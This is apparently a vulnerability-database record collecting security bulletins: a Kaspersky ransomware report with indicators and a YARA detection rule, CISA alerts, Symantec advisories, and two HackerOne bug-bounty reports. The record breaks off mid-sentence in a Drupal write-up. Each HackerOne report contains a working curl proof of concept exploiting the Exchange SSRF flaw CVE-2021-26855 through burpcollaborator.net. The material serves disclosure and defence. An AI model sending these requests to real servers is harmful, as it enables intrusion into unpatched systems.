\n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&amp;CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-03-10T18:11:04", "description": "Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities\u2014CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065\u2014to take control of an affected system and can exploit one vulnerability\u2014CVE-2021-26855\u2014to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and apply the necessary updates or workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T00:00:00", "id": "CISA:16DE226AFC5A22020B20927D63742D98", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:41", "description": "The Samba Team has released a security update to address a critical vulnerability\u2014CVE-2020-1472\u2014in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for [CVE-2020-1472](<https://www.samba.org/samba/security/CVE-2020-1472.html>) and apply the necessary updates or workaround.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "cisa", "title": "Samba Releases Security Update for CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CISA:7FB0A467C0EB89B6198A58418B43D50C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "description": "Microsoft has released a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) on cyber threat actors exploiting CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. The Cybersecurity and Infrastructure Security Agency (CISA) has observed nation state activity exploiting this vulnerability. This malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks.\n\nCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes. If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services.\n\nIn the coming weeks and months, administrators should take follow-on actions that are described in [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) released by Microsoft to prepare for the second half of Microsoft\u2019s Netlogon migration process, which is scheduled to conclude in February 2021.\n\nCISA encourages users and administrators to review the following resources and apply the necessary updates and mitigations.\n\n * Microsoft blog post: [Attacks exploiting Netlogon vulnerability (CVE-2020-1472)](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)\n * Microsoft: August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft: [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n * CISA Joint Cybersecurity Advisory: [AA20-283A APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-29T00:00:00", "type": "cisa", "title": "Microsoft Warns of Continued Exploitation of CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-10T00:00:00", "id": "CISA:61F2653EF56231DB3AEC3A9E938133FE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:40", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available exploit code for CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors. Attackers could exploit this vulnerability to obtain domain administrator access.\n\nCISA encourages users and administrators to review Microsoft\u2019s August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) and [Article](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "cisa", "title": "Exploit for Netlogon Remote Protocol Vulnerability, CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-14T00:00:00", "id": "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2021-03-24T23:28:04", "bounty": 0.0, "description": "**Description:**\nThere exists a Server Side Request Frogery (SSRF) on ***\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588*** due to ***CVE-2021-26855***\n\n## References\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855\n\n## Impact\n\nServer Side Request Frogery\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-26855\n\n## Steps to Reproduce\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n -b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \\\n $'https://\u2588\u2588\u2588/owa/auth/x.js'\n```\n\nOutput:\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-07T11:31:33", "type": "hackerone", "title": "U.S. Dept Of Defense: SSRF due to CVE-2021-26855 on \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-24T20:53:21", "id": "H1:1119224", "href": "https://hackerone.com/reports/1119224", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-24T23:28:03", "bounty": 0.0, "description": "**Description:**\n***CVE-2021-26855*** exists on ***\u2588\u2588\u2588\u2588\u2588\u2588\u2588 resulting*** in SSRF\n\n## References\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855\n\n## Impact\n\nServer Side Request Frogery\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-26855\n\n## Steps to Reproduce\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n -b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/owa/auth/x.js'\n```\n\nOUTPUT:\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-07T11:37:32", "type": "hackerone", "title": "U.S. Dept Of Defense: CVE-2021-26855 on \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 resulting in SSRF", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-24T20:54:28", "id": "H1:1119228", "href": "https://hackerone.com/reports/1119228", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-06-08T18:51:35", "description": "### Description\n\nMultiple Citrix Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Citrix NetScaler Gateway 10.5 \n * Citrix NetScaler Gateway 11.1 \n * Citrix NetScaler Gateway 12.0 \n * Citrix NetScaler Gateway 12.1 \n * Citrix NetScaler Gateway 13.0 \n * Citrix Netscaler Application Delivery Controller 10.5 \n * Citrix Netscaler Application Delivery Controller 11.1 \n * Citrix Netscaler Application Delivery Controller 12.0 \n * Citrix Netscaler Application Delivery Controller 12.1 \n * Citrix Netscaler Application Delivery Controller 13.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as non-executable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2019-12-17T00:00:00", "type": "symantec", "title": "Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2019-12-17T00:00:00", "id": "SMNTC-111238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111238", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:04:40", "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-11-14T00:00:00", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:52", "description": "### Description\n\nMicrosoft SharePoint Server is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft SharePoint Enterprise Server 2016 \n * Microsoft SharePoint Foundation 2013 SP1 \n * Microsoft SharePoint Server 2010 SP2 \n * Microsoft SharePoint Server 2019 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2019-02-12T00:00:00", "type": "symantec", "title": "Microsoft SharePoint Server CVE-2019-0604 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-0604"], "modified": "2019-02-12T00:00:00", "id": "SMNTC-106914", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/106914", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2018-06-08T07:10:20", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and 